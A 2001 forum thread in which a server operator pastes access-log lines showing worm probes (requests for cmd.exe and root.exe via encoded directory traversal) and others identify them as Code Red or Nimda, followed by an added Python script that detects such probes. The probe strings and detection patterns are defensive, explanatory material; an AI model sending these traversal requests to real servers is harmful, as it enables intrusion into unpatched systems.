Hammerton
Posted December 17, 2001

I recently started up a new FM5 Unlimited server set-up. Over the weekend I got an enormous number of requests, all of the sort that I have pasted below. The sites that I serve are academic and should not be getting any hits. Are these robots? Hacks? Or is this what a typical visit looks like on the access log? I previously used FM4.1 and it either didn't have this feature or I was too stupid to use it. I have limited IP access to my subnet so I don't think any damage was done in any event.

203.73.193.54 - - [15/Dec/2001:07:51:52 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1372
203.73.193.54 - - [15/Dec/2001:07:52:16 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1368
203.73.193.54 - - [15/Dec/2001:07:52:18 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388
203.73.193.54 - - [15/Dec/2001:07:52:20 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388
203.73.193.54 - - [15/Dec/2001:07:52:31 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416
203.73.193.54 - - [15/Dec/2001:07:52:32 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450
203.73.193.54 - - [15/Dec/2001:07:52:37 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450
203.73.193.54 - - [15/Dec/2001:07:54:12 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424
203.73.193.54 - - [15/Dec/2001:07:54:14 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424

MpWiedemann
Posted December 17, 2001

Those hits are from an internet worm. Either "Code Red" or "Nimda". If you are running IIS, make sure you have installed all the Microsoft Code Red patches. The hits are coming from other unpatched and infected IIS servers. Other than installing the patches there is not much you can do to prevent this.

Good luck,
Martin

Hammerton
Posted December 17, 2001

Thanks Martin. I am running webstar on an old mac, and connecting to FM5U thru the FMWSC. Does any of that afford me protection? How do other folks deal with this? I read some posts about blocking access to those IPs but that seems futile given the volume.

MpWiedemann
Posted December 17, 2001

As long as you are not using IIS on Windows you are safe.

dwal
Posted December 18, 2001

IPNetSentry from http://www.sustworks.com will stop these 'Nimda' hits.

Hammerton
Posted December 20, 2001

Dwal - Thanks. IPNetSentry is great! See my post titled Cool Security Solution.
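
Added example, not written by any poster in this thread: a Python check that recognises request lines like the ones in the first post and reports, per source address, how many probes arrived and whether any was answered with a 2xx status. The names `classify` and `summarize`, the reason labels, and the benign sample line are this example's own.

```python
import re
from urllib.parse import unquote

# Lines copied from the access log in the first post of this thread.
SAMPLE_LOG = """\
203.73.193.54 - - [15/Dec/2001:07:51:52 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1372
203.73.193.54 - - [15/Dec/2001:07:52:20 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388
203.73.193.54 - - [15/Dec/2001:07:52:31 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416
203.73.193.54 - - [15/Dec/2001:07:54:14 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424
"""
# Constructed line: an ordinary request, to show what is not flagged.
BENIGN = '192.0.2.10 - - [15/Dec/2001:08:00:00 -0600] "GET /index.html HTTP/1.0" 200 5120'

CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+$')
# Windows executables requested by the probes in the post.
TARGETS = re.compile(r'(?:^|[/\\])(?:cmd|root)\.exe$', re.I)
# Escapes hiding a path separator: double-encoded (%25xx) or overlong UTF-8 (%c0/%c1).
ENCODED_SEP = re.compile(r'%25[0-9a-f]{2}|%c[01]%[0-9a-f]{2}', re.I)

def classify(line):
    """Return (ip, status, reasons) for one Common Log Format line, or None."""
    m = CLF.match(line.strip())
    if not m:
        return None
    ip, url, status = m.groups()
    path = url.split('?', 1)[0]
    reasons = []
    if TARGETS.search(unquote(unquote(path))):  # decode twice: %255c -> %5c -> backslash
        reasons.append('windows-shell-target')
    if '..' in path and ENCODED_SEP.search(path):
        reasons.append('encoded-traversal')
    return ip, status, reasons

def summarize(lines):
    """Per source IP: number of probe requests and how many got a 2xx answer."""
    report = {}
    for line in lines:
        hit = classify(line)
        if hit and hit[2]:
            entry = report.setdefault(hit[0], {'probes': 0, 'answered_2xx': 0})
            entry['probes'] += 1
            entry['answered_2xx'] += int(hit[1].startswith('2'))
    return report

if __name__ == '__main__':
    for ip, stats in summarize(SAMPLE_LOG.splitlines() + [BENIGN]).items():
        print(ip, stats)
```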